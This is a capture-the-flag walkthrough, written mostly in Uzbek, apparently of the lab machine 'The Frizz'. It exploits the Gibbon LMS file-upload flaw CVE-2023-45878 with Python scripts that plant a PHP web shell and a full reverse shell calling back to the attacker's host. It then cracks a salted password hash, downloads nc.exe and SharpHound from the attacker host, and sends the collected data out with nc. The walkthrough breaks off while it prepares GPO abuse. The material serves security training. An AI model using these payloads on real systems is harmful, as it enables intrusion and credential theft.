The Frizz

Umumiy Ma’lumotlar
IP address 10.10.11.60

Microsoft Windows Server 2022

Operatsion Tizim Nomi (Distribution)
Datacenter
Operatsion Tizim Kernel Verisyasi 10.0.20348 N/A Build 20348

Apache/2.4.58 (Win64)
Web Server dasturi va Versiyasi
OpenSSL/3.1.3 PHP/8.2.12

22, 53, 80, 88, 135, 139, 389,

Ochiq Portlar
445, 464, 593, 636, 3269

Topilgan Flaglar

💡 Flag ni belgilangan bo’limga nusxa ko’chirib tashlang. Bundan tashqari flag

topilgan ekran screenshotini ham ushbu bo’limga tashlang.

User Flag

The Frizz 1
 💡 User Flag: 4a279e844a63ab3a5f375ba3438da57969e

Root Flag

💡 Root Flag: a1d4a462107bc2267d2af068b019e369694

Toplgan Zaifliklar

💡 Har bitta topilgan zaiflikni shu yerda to’ldirib, u haqida batafsil malumot
olish uchun link qoldirasiz. U zaiflik nimalarga saba bo’lishi va qaysi explit
orqali buzilishinni ham shu yerda tushuntirib berishingiz kerak. Birnchida
keltirilgan zaiflik bu sizga misol sifatida keltirilgan. Nechta zaiflik topa
olsangiz barchasini kiriting.

The Frizz 2
 Ushbu CVE x dasturining 2.X.X-
versiyasida mavjud bo’lib,
hujumchiga X hujumni amalga
CVE-XXXX- Exploit linki berilishi kerak agar
oshirishga yordam beradi. Bu zaiflik
XXXX mavjud bo’lsa
X zailik deb ataladi. Ushu havola
orqali batafsil o’rganib chiqish
mumkin. [Link qoldirasiz.]

Ushbu CVE Gibbon dasturining

25.0.01-versiyasida mavjud bo’lib,
hujumchiga shell yuklash va uni
bajarish hujumni amalga oshirishga
CVE-2023- yordam beradi. Bu zaiflik File https://nvd.nist.gov/vuln/detail/CVE-
45878 Uploads zailik deb ataladi. Ushu 2023-45878
havola orqali batafsil o’rganib chiqish
mumkin.
https://herolab.usd.de/security-
advisories/usd-2023-0025/

Hisobot

💡 Har bitta bosqichda qilgan ishlaringizni batafsil, screenshotlar,

foydalanilgan explitlar bilan tushuntirib yozing.

Enumeration (Ma’lumot to’plash)

The Frizz 3
 ┌──(kali ㉿kali)-[~]
└─$ nmap -sSCV -Pn 10.10.11.60 --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 08:58 EDT
Nmap scan report for frizzdc.frizz.htb (10.10.11.60)
Host is up (0.098s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNS-SD-TCP:
| _services
| _dns-sd
| _udp
|_ local
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-title: Education — Walkerville Elementary School
|_Requested resource was http://frizzdc.frizz.htb/home/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025
-03-19 19:58:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:
frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/versio
n, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.
cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=3/19%Time=67DABF9D%P=x86_64-pc-linu
x-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x0

The Frizz 4
 4
SF:_udp\x05local\0\0\x0c\0\x01");
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsof
t:windows

Host script results:

| smb2-time:
| date: 2025-03-19T19:59:15
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s

Service detection performed. Please report any incorrect results at https://n

map.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.78 seconds

Bizda 80 portda website borakan unga kirib ko’ramiz

Staff logiin button borakan. Shu login pagega o’tib ko’ramiz

The Frizz 5
 Gibbon-LMS page borakan uni scan qilamiz

㉿
┌──(kali kali)-[~]
└─$ gobuster dir -u http://frizzdc.frizz.htb/Gibbon-LMS -w /usr/share/wordli
sts/dirb/common.txt -t 60
=======================================================
========
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
=======================================================
========
[+] Url: http://frizzdc.frizz.htb/Gibbon-LMS
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
=======================================================
========
Starting gobuster in directory enumeration mode
=======================================================
========

The Frizz 6
 /.hta (Status: 403) [Size: 306]
/.htaccess (Status: 403) [Size: 306]
/akeeba.backend.log (Status: 403) [Size: 306]
/.htpasswd (Status: 403) [Size: 306]
/aux (Status: 403) [Size: 306]
/com2 (Status: 403) [Size: 306]
/com3 (Status: 403) [Size: 306]
/com1 (Status: 403) [Size: 306]
/con (Status: 403) [Size: 306]
/development.log (Status: 403) [Size: 306]
/favicon.ico (Status: 200) [Size: 32988]
/installer (Status: 301) [Size: 361] [--> http://frizzdc.frizz.htb/Gibbon-L
MS/installer/]
/index.php (Status: 200) [Size: 22064]
/lib (Status: 301) [Size: 355] [--> http://frizzdc.frizz.htb/Gibbon-LM
S/lib/]
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_js": context deadline exce
eded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_fpclass": context deadline
exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_cache": context deadline
exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_includes": context deadlin
e exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_img": context deadline ex
ceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_layouts": context deadline
exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_images": context deadline
exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_install": context deadline
exceeded (Client.Timeout exceeded while awaiting headers)
/license (Status: 200) [Size: 35113]
/LICENSE (Status: 200) [Size: 35113]
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_lib": context deadline exc
eeded (Client.Timeout exceeded while awaiting headers)
/lpt1 (Status: 403) [Size: 306]

The Frizz 7
 /lpt2 (Status: 403) [Size: 306]
/modules (Status: 301) [Size: 359] [--> http://frizzdc.frizz.htb/Gibbon-
LMS/modules/]
/nul (Status: 403) [Size: 306]
/php.ini (Status: 403) [Size: 306]
/prn (Status: 403) [Size: 306]
/production.log (Status: 403) [Size: 306]
/Resources (Status: 301) [Size: 361] [--> http://frizzdc.frizz.htb/Gibbon
-LMS/Resources/]
/resources (Status: 301) [Size: 361] [--> http://frizzdc.frizz.htb/Gibbon-
LMS/resources/]

Bizda modules page borakan endi Gibbon-LMS nimaligi haqida research qilamiz

https://nvd.nist.gov/vuln/detail/CVE-2023-45878 ga kiramiz

The Frizz 8
 https://herolab.usd.de/security-advisories/usd-2023-0025/

Endi Rubrics borligini scan qilib ko’ramiz

㉿
┌──(kali kali)-[~]
└─$ curl -I http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visu
alise_saveAjax.php

The Frizz 9
 HTTP/1.1 200 OK
Date: Wed, 19 Mar 2025 20:57:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Set-Cookie: G60fa1cd0af7be78b=1d654e8norcepkuunfmaoalh29; path=/; Htt
pOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8

Exploitation (Buzib kirish)

Bizda borakan endi cve sinab ko’ramiz

import requests
import base64

# Target URL of the vulnerable Gibbon LMS instance

url = "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_
saveAjax.php"

# Base64 encoded PHP payload for system command execution

php_payload = "<?php echo system($_GET['cmd']);?>"
encoded_php_payload = base64.b64encode(php_payload.encode()).decode

The Frizz 10
 ()

# File path to write the payload (this could be modified depending on the ser
ver's configuration)
path = "myshell.php" # The PHP shell that will be written on the server

# gibbonPersonID (just needs to be padded to 10 characters, can be any valu

e)
gibbonPersonID = "0000000001"

# Payload for the POST request

payload = {
"img": f"image/png;asdf,{encoded_php_payload}", # The payload with the
base64 encoded PHP code
"path": path, # The file name to write the payload to
"gibbonPersonID": gibbonPersonID # gibbonPersonID parameter
}

# Sending the POST request to the server

response = requests.post(url, data=payload)

# Check the response

if response.status_code == 200:
print(f"Payload sent successfully to {url}. The file should be accessible at:
{url.rsplit('/', 1)[0]}/{path}")
else:
print(f"Failed to send payload. HTTP status code: {response.status_cod
e}")

verbose varianti

import requests
import base64

# Target URL of the vulnerable Gibbon LMS instance

url = "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_
saveAjax.php"

The Frizz 11
 # Base64 encoded PHP payload for system command execution
php_payload = "<?php echo system($_GET['cmd']);?>"
encoded_php_payload = base64.b64encode(php_payload.encode()).decode
()

# File path to write the payload (this could be modified depending on the ser
ver's configuration)
path = "myshell.php" # The PHP shell that will be written on the server

# gibbonPersonID (just needs to be padded to 10 characters, can be any valu

e)
gibbonPersonID = "0000000001"

# Payload for the POST request

payload = {
"img": f"image/png;asdf,{encoded_php_payload}", # The payload with the
base64 encoded PHP code
"path": path, # The file name to write the payload to
"gibbonPersonID": gibbonPersonID # gibbonPersonID parameter
}

# Print request details

print(f"[+] Sending POST request to {url}")
print("[+] Headers:")
print(" Content-Type: application/x-www-form-urlencoded")
print("[+] Payload:")
for key, value in payload.items():
print(f" {key}: {value}")

# Sending the POST request to the server

response = requests.post(url, data=payload)

# Print response details

print("\n[+] Server Response:")
print(f" Status Code: {response.status_code}")
print(f" Headers: {response.headers}")

The Frizz 12
 print(f" Body:\n{response.text}")

# Check the response

if response.status_code == 200:
shell_url = f"{url.rsplit('/', 1)[0]}/{path}"
print(f"[+] Payload sent successfully! The shell should be accessible at: {s
hell_url}")
else:
print(f"[-] Failed to send payload. HTTP status code: {response.status_cod
e}")

shuni ishlatib ko’ramiz

┌──(kali ㉿kali)-[~]
└─$ python3 shell.py
[+] Sending POST request to http://frizzdc.frizz.htb/Gibbon-LMS/modules/Ru
brics/rubrics_visualise_saveAjax.php
[+] Headers:
Content-Type: application/x-www-form-urlencoded
[+] Payload:
img: image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCd
dKTs/Pg==
path: myshell.php
gibbonPersonID: 0000000001

[+] Server Response:

Status Code: 200
Headers: {'Date': 'Wed, 19 Mar 2025 21:02:06 GMT', 'Server': 'Apache/2.4.
58 (Win64) OpenSSL/3.1.3 PHP/8.2.12', 'Set-Cookie': 'G60fa1cd0af7be78b=p
4g3ssv5o17dinft0msi8lgd7u; path=/; HttpOnly; SameSite=Lax', 'X-Frame-Opti

The Frizz 13
 ons': 'SAMEORIGIN', 'Pragma': 'no-cache', 'Cache-Control': 'max-age=0, no-
cache, no-store, must-revalidate', 'Expires': 'Thu, 1 Jan 1970 00:00:00 GMT',
'Content-Length': '11', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Kee
p-Alive', 'Content-Type': 'text/html; charset=UTF-8'}
Body:
myshell.php
[+] Payload sent successfully! The shell should be accessible at: http://frizzd
c.frizz.htb/Gibbon-LMS/modules/Rubrics/myshell.php

Bizda ishladi endi browserdan cmd ishlatib ko’ramiz

http://frizzdc.frizz.htb/Gibbon-LMS/myshell.php?cmd=whoami

ishladi endi reverse shell uchun php file jo’natamiz

import requests
import base64

url = "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_
saveAjax.php"

# PowerShell reverse shell payload for Windows (using PowerShell to initiate

reverse shell)

The Frizz 14
 php_payload = r"""
<?php class Sh{private $a=null;private $p=null;private $os=null;private $sh=
null;private $des=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pip
e','w'));private $b=1024;private $c=0;private $e=false;private $sd=true;publi
c function __construct($a,$p){$this->a=$a;$this->p=$p;}private function det
(){$d=true;$os=PHP_OS;if(stripos($os,'LINUX')!==false||stripos($os,'DARWI
N')!==false){$this->os='LINUX';$this->sh='/bin/sh';}else if(stripos($os,'WIND
OWS')!==false||stripos($os,'WINNT')!==false||stripos($os,'WIN32')!==false)
{$this->os='WINDOWS';$this->sh='cmd.exe';}else{$d=false;echo "SYS_ERR
OR: Underlying operating system is not supported, script will now exit...\n";}r
eturn $d;}private function daem(){$e=false;if(!function_exists('pcntl_fork')){e
cho "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";}else if(($pid
=@pcntl_fork())<0){echo "DAEMONIZE: Cannot fork off the parent process,
moving on...\n";}else if($pid>0){$e=true;echo "DAEMONIZE: Child process f
orked off successfully, parent process will now exit...\n";}else if(posix_setsid
()<0){echo "DAEMONIZE: Forked off the parent process but cannot set a new
SID, moving on as an orphan...\n";}else{echo "DAEMONIZE: Completed succ
essfully!\n";}return $e;}private function sett(){@error_reporting(0);@set_time
_limit(0);@umask(0);}private function d($d){if($this->sd){$d=str_replace
('<','&lt;',$d);$d=str_replace('>','&gt;',$d);echo $d;}}private function r
($s,$n,$b){if(($d=@fread($s,$b))===false){$this->e=true;echo"STRM_ERRO
R: Cannot read from {$n}, script will now exit...\n";}return $d;}private functio
n w($s,$n,$d){if(($by=@fwrite($s,$d))===false){$this->e=true;echo"STRM_
ERROR: Cannot write to {$n}, script will now exit...\n";}return $by;}private fun
ction rw($i,$o,$in,$on){while(($d=$this->r($i,$in,$this->b))&&$this->w($o,$o
n,$d)){if($this->os==='WINDOWS'&&$on==='STDIN'){$this->c+=strlen($d);}
$this->d($d);}}private function brw($i,$o,$in,$on){$s=fstat($i)['size'];if($this
->os==='WINDOWS'&&$in==='STDOUT'&&$this->c){while($this->c>0&&($by
=$this->c>=$this->b?$this->b:$this->c)&&$this->r($i,$in,$by)){$this->c-=$b
y;$s-=$by;}}while($s>0&&($by=$s>=$this->b?$this->b:$s)&&($d=$this->r
($i,$in,$by))&&$this->w($o,$on,$d)){$s-=$by;$this->d($d);}}public function
rn(){if($this->det()&&!$this->daem()){$this->sett();$soc=@fsockopen($this->
a,$this->p,$ern,$ers,30);if(!$soc){echo"SOC_ERROR: {$ern}: {$ers}\n";}else
{stream_set_blocking($soc,false);$proc=@proc_open($this->sh,$this->de
s,$ps,null,null);if(!$proc){echo "PROC_ERROR: Cannot start the shell\n";}else
{foreach($ps as $p){stream_set_blocking($p,false);}$stat=proc_get_status
($proc);@fwrite($soc,"SOCKET: Shell has connected! PID: {$stat['pid']}\n");d

The Frizz 15
 o{$stat=proc_get_status($proc);if(feof($soc)){echo "SOC_ERROR: Shell conn
ection has been terminated\n";break;}else if(feof($ps[1])||!$stat['running']){e
cho "PROC_ERROR: Shell process has been terminated\n";break;}$s=array('r
ead'=>array($soc,$ps[1],$ps[2]),'write'=>null,'except'=>null);$ncs=@stream_s
elect($s['read'],$s['write'],$s['except'],0);if($ncs===false){echo "STRM_ERR
OR: stream_select() failed\n";break;}else if($ncs>0){if($this->os==='LINUX')
{if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(in_
array($ps[2],$s['read'])){$this->rw($ps[2],$soc,'STDERR','SOCKET');}if(in_ar
ray($ps[1],$s['read'])){$this->rw($ps[1],$soc,'STDOUT','SOCKET');}}else if
($this->os==='WINDOWS'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps
[0],'SOCKET','STDIN');}if(($f=fstat($ps[2]))&&$f['size']){$this->brw($ps
[2],$soc,'STDERR','SOCKET');}if(($f=fstat($ps[1]))&&$f['size']){$this->brw
($ps[1],$soc,'STDOUT','SOCKET');}}}}while(!$this->e);foreach($ps as $p){fcl
ose($p);}proc_close($proc);}fclose($soc);}}}}echo '<pre>';$sh=new Sh('10.1
0.14.109',5555);$sh->rn();unset($sh);/*@gc_collect_cycles();*/echo '</pre>';
?>
"""

encoded_php_payload = base64.b64encode(php_payload.encode()).decode
()
path = "shell.php" # The PHP shell that will be written on the server
gibbonPersonID = "0000000001"

payload = {
"img": f"image/png;asdf,{encoded_php_payload}", # The payload with the
base64 encoded PHP code
"path": path, # The file name to write the payload to
"gibbonPersonID": gibbonPersonID # gibbonPersonID parameter
}

response = requests.post(url, data=payload)

if response.status_code == 200:
print(f"Payload sent successfully to {url}. The file should be accessible at:
{url.rsplit('/', 1)[0]}/{path}")
else:

The Frizz 16
 print(f"Failed to send payload. HTTP status code: {response.status_cod
e}")

┌──(kali ㉿kali)-[~]
└─$ python3 revshell.py
Payload sent successfully to http://frizzdc.frizz.htb/Gibbon-LMS/modules/Ru
brics/rubrics_visualise_saveAjax.php. The file should be accessible at: http://f
rizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/shell.php

Endi http://frizzdc.frizz.htb/Gibbon-LMS/shell.php ga kiramiz va nc -lvnp 5555

bilan tinglimiz

C:\xampp\htdocs\Gibbon-LMS>dir C:\xampp\mysql\bin\mysql.exe
Volume in drive C has no label.
Volume Serial Number is D129-C3DA

Directory of C:\xampp\mysql\bin

10/30/2023 05:58 AM 3,784,616 mysql.exe

1 File(s) 3,784,616 bytes

The Frizz 17
 0 Dir(s) 1,572,188,160 bytes free

C:\xampp\htdocs\Gibbon-LMS>dir config.php
Volume in drive C has no label.
Volume Serial Number is D129-C3DA

Directory of C:\xampp\htdocs\Gibbon-LMS

10/11/2024 08:15 PM 1,307 config.php

1 File(s) 1,307 bytes
0 Dir(s) 1,674,522,624 bytes free

C:\xampp\htdocs\Gibbon-LMS>type config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker

This program is free software: you can redistribute it and/or modify

it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,

but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/

/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/

The Frizz 18
 $databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

/**
* Sets a globally unique id, to allow multiple installs on a single server.
*/
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';

/**
* Sets system-wide caching factor, used to balance performance and freshn
ess.
* Value represents number of page loads between cache refresh.
* Must be positive integer. 1 means no caching.
*/
$caching = 10;

endi shu credentials bilan msqle.exe ishlatib dabasega ulanamiz

C:\xampp\mysql\bin>mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -

e "SHOW DATABASES;"
Database
gibbon
information_schema
test

C:\xampp\mysql\bin>mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -

e "USE gibbon; SELECT * FROM gibbonperson;"
gibbonPersonID title surname firstName preferredName officialName
nameInCharacters gender username passwordStrong passwordStr
ongSalt passwordForceReset status canLogin gibbonRoleIDPrimar
ygibbonRoleIDAll dob email emailAlternate image_240 lastIPAddress
lastTimestamp lastFailIPAddress lastFailTimestamp failCount addr
ess1 address1District address1Country address2 address2Distric
t address2Country phone1Type phone1CountryCode phone1 phone3
Type phone3CountryCode phone3 phone2Type phone2CountryCo

The Frizz 19
 de phone2 phone4Type phone4CountryCode phone4 website lan
guageFirst languageSecond languageThird countryOfBirth birthCertifica
teScan ethnicity religion profession employer jobTitle em
ergency1Name emergency1Number1 emergency1Number2 emergenc
y1Relationship emergency2Name emergency2Number1 emergency2N
umber2 emergency2Relationship gibbonHouseID studentID dateStar
t dateEnd gibbonSchoolYearIDClassOf lastSchool nextSchool de
partureReason transport transportNotes calendarFeedPersonal viewC
alendarSchool viewCalendarPersonal viewCalendarSpaceBooking gi
bbonApplicationFormID lockerNumber vehicleRegistration personalBack
groundmessengerLastRead privacy dayType gibbonThemeIDPersonal gi
bboni18nIDPersonal studentAgreements googleAPIRefreshToken micro
softAPIRefreshToken genericAPIRefreshToken receiveNotificationEmails
mfaSecret mfaToken cookieConsent fields
0000000001 Ms. Frizzle Fiona Fiona Fiona Frizzle Unspecified
f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784
242b0b0c03 /aACFhikmNopqrRTVz2489 N Full Y 001 001NU
LL f.frizzle@frizz.htb NULL NULL ::1 2024-10-29 09:28:59 10.10.1
6.68 2025-03-19 17:12:05 1
NULL NULL NULL NULL Y Y
N NULL NULL NULL NULL NULL NULL NULL
Y NULL NULL NULL

C:\xampp\mysql\bin>

salt /aACFhikmNopqrRTVz2489
hash
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
Endi buni crack qilamiz

import hashlib

hash_to_crack = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f8
0ff784242b0b0c03"
salt = "/aACFhikmNopqrRTVz2489"

The Frizz 20
 with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin-1") as f:
for password in f:
password = password.strip()
hashed = hashlib.sha256((salt + password).encode()).hexdigest()
if hashed == hash_to_crack:
print(f"Password found: {password}")
break

======================================================
=========================

㉿
┌──(kali kali)-[~]
└─$ python3 crack_sha256_salted.py
Password found: Jenni_Luvs_Magic23

Initial Access (Kirish huquqiga erishish)

username: f.frizzle
password:
Jenni_Luvs_Magic23
Endi TGT olamiz f.frizzle useriga va birinchi

sudo nano /etc/krb5.conf

=======================================
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 24h
forwardable = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}

The Frizz 21
 [domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
==============================================
sudo nano /etc/hosts

10.10.11.60 frizzdc.frizz.htb frizz.htb

Endi TGTni olamiz va password kiritamiz

┌──(kali ㉿kali)-[~]
└─$ kinit f.frizzle@FRIZZ.HTB
Password for f.frizzle@FRIZZ.HTB:
㉿
┌──(kali kali)-[~]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: f.frizzle@FRIZZ.HTB

Valid starting Expires Service principal

03/19/2025 18:18:19 03/20/2025 04:18:19 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/20/2025 18:18:09

┌──(kali ㉿kali)-[~]
└─$ ssh f.frizzle@frizz.htb -K

PowerShell 7.4.5
PS C:\Users\f.frizzle>
PS C:\Users\f.frizzle> cd /
PS C:\> mkdir Temp

Directory: C:\

Mode LastWriteTime Length Name

---- ------------- ------ ----

The Frizz 22
 d---- 3/19/2025 3:30 PM Temp

frizz\f.frizzle@FRIZZDC C:\>dir /a C:\

Volume in drive C has no label.
Volume Serial Number is D129-C3DA

Directory of C:\

10/29/2024 07:31 AM <DIR> $RECYCLE.BIN

03/10/2025 03:31 PM <DIR> $WinREAgent
02/20/2025 03:51 PM <DIR> Config.Msi
10/29/2024 09:12 AM <JUNCTION> Documents and Settings [C:\Users]
10/29/2024 08:27 AM 12,288 DumpStack.log.tmp
03/10/2025 03:39 PM <DIR> inetpub
05/08/2021 01:15 AM <DIR> PerfLogs
02/26/2025 09:13 AM <DIR> Program Files
05/08/2021 02:34 AM <DIR> Program Files (x86)
02/20/2025 03:50 PM <DIR> ProgramData
10/29/2024 09:12 AM <DIR> Recovery
10/29/2024 07:25 AM <DIR> System Volume Information
10/29/2024 07:31 AM <DIR> Users
03/10/2025 03:41 PM <DIR> Windows
10/29/2024 07:28 AM <DIR> xampp
1 File(s) 12,288 bytes
14 Dir(s) 1,672,814,592 bytes free

frizz\f.frizzle@FRIZZDC C:\>dir /a C:\$Recycle.Bin\

Volume in drive C has no label.
Volume Serial Number is D129-C3DA

Directory of C:\$Recycle.Bin

10/29/2024 07:31 AM <DIR> .

03/10/2025 03:39 PM <DIR> ..
10/29/2024 07:31 AM <DIR> S-1-5-21-2386970044-1145388522-293
2701813-1103
0 File(s) 0 bytes

The Frizz 23
 3 Dir(s) 1,672,818,688 bytes free

frizz\f.frizzle@FRIZZDC C:\>dir /a C:\$Recycle.Bin\S-1-5-21-2386970044-114

5388522-2932701813-1103
Volume in drive C has no label.
Volume Serial Number is D129-C3DA

Directory of C:\$Recycle.Bin\S-1-5-21-2386970044-1145388522-293270181
3-1103

10/29/2024 07:31 AM <DIR> .

10/29/2024 07:31 AM <DIR> ..
10/29/2024 07:31 AM 148 $IE2XMEG.7z
10/24/2024 09:16 PM 30,416,987 $RE2XMEG.7z
10/29/2024 07:31 AM 129 desktop.ini
3 File(s) 30,417,264 bytes
2 Dir(s) 1,672,753,152 bytes free

zipda M.schoolbus user va uning passwordi !suBcig@MehTed!R

PS C:\> mkdir Temp

Directory: C:\

Mode LastWriteTime Length Name

---- ------------- ------ ----
d----- 3/19/2025 4:05 PM Temp

PS C:\> cd Temp
PS C:\Temp>
PS C:\Temp> Invoke-WebRequest -Uri "http://10.10.14.109:8000/nc.exe" -Out
File "C:\Temp\nc.exe"
PS C:\Temp> dir

The Frizz 24
 Directory: C:\Temp

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 3/19/2025 4:05 PM 38616 nc.exe

PS C:\Temp> Invoke-WebRequest -Uri "http://10.10.14.109:8000/SharpHound.

exe" -OutFile "C:\Temp\SharpHound.exe"
PS C:\Temp> dir

Directory: C:\Temp

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 3/19/2025 4:05 PM 38616 nc.exe
-a---- 3/19/2025 4:20 PM 906752 SharpHound.exe

PS C:\Temp> .\SharpHound.exe -c All --zipfilename frizzle

2025-03-19T16:21:50.1640659-07:00|INFORMATION|Resolved Collection Me
thods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL,
Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-03-19T16:21:50.1640659-07:00|INFORMATION|Initializing SharpHound
at 4:21 PM on 3/19/2025
2025-03-19T16:21:50.5545689-07:00|INFORMATION|Flags: Group, LocalAd
min, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, Obje
ctProps, DCOM, SPNTargets, PSRemote
2025-03-19T16:21:51.7889411-07:00|INFORMATION|Beginning LDAP search f
or frizz.htb
2025-03-19T16:21:51.9295762-07:00|INFORMATION|Producer has finished,
closing LDAP channel
2025-03-19T16:21:51.9451868-07:00|INFORMATION|LDAP channel closed, w
aiting for consumers

The Frizz 25
 2025-03-19T16:22:22.3514306-07:00|INFORMATION|Status: 0 objects finish
ed (+0 0)/s -- Using 36 MB RAM
2025-03-19T16:22:35.9139333-07:00|INFORMATION|Consumers finished, cl
osing output channel
2025-03-19T16:22:35.9608117-07:00|INFORMATION|Output channel closed,
waiting for output task to complete
Closing writers
2025-03-19T16:22:36.4920566-07:00|INFORMATION|Status: 112 objects fini
shed (+112 2.545455)/s -- Using 43 MB RAM
2025-03-19T16:22:36.4920566-07:00|INFORMATION|Enumeration finished i
n 00:00:44.7062401
2025-03-19T16:22:36.8514312-07:00|INFORMATION|SharpHound Enumerati
on Completed at 4:22 PM on 3/19/2025! Happy Graphing!

frizz\f.frizzle@FRIZZDC C:\Temp>nc -w 3 10.10.14.109 4444 < "C:\Temp\2025

0319162234_frizzle.zip"

============================================

┌──(kali ㉿kali)-[~]
└─$ nc -lvnp 4444 > frizzle.zip
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 56004

Privilage Escalation (Huquqlarni oshirish)

Endi TGT olamiz M.schoolbus useri uchun. Agar ssh ishlamasa machine reset
qilish kerak. Qo’li qichiganla topiladi

┌──(kali ㉿kali)-[~/Downloads]
└─$ klist
klist: No credentials cache found (filename: M.schoolbus.ccache)

㉿
┌──(kali kali)-[~/Downloads]
└─$ kinit M.schoolbus@FRIZZ.HTB
Password for M.schoolbus@FRIZZ.HTB:

The Frizz 26
 ㉿
┌──(kali kali)-[~/Downloads]
└─$ klist
Ticket cache: FILE:M.schoolbus.ccache
Default principal: M.schoolbus@FRIZZ.HTB

Valid starting Expires Service principal

03/19/2025 20:35:04 03/20/2025 06:35:04 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/20/2025 20:34:42

㉿
┌──(kali kali)-[~/Downloads]
└─$ ssh M.schoolbus@FRIZZ.HTB -K

PowerShell 7.4.5
PS C:\Users\M.SchoolBus>

The Frizz 27
 Bizda GPO yozish huquqi bor

https://github.com/antonioCoco/RunasCs/releases/tag/v1.5

Runas.exe

https://github.com/byronkg/SharpGPOAbuse/releases

The Frizz 28
 SharpGPOAbuse.exe

Ko’chirib Temphga yuklimiz

PS C:\> cd Temp
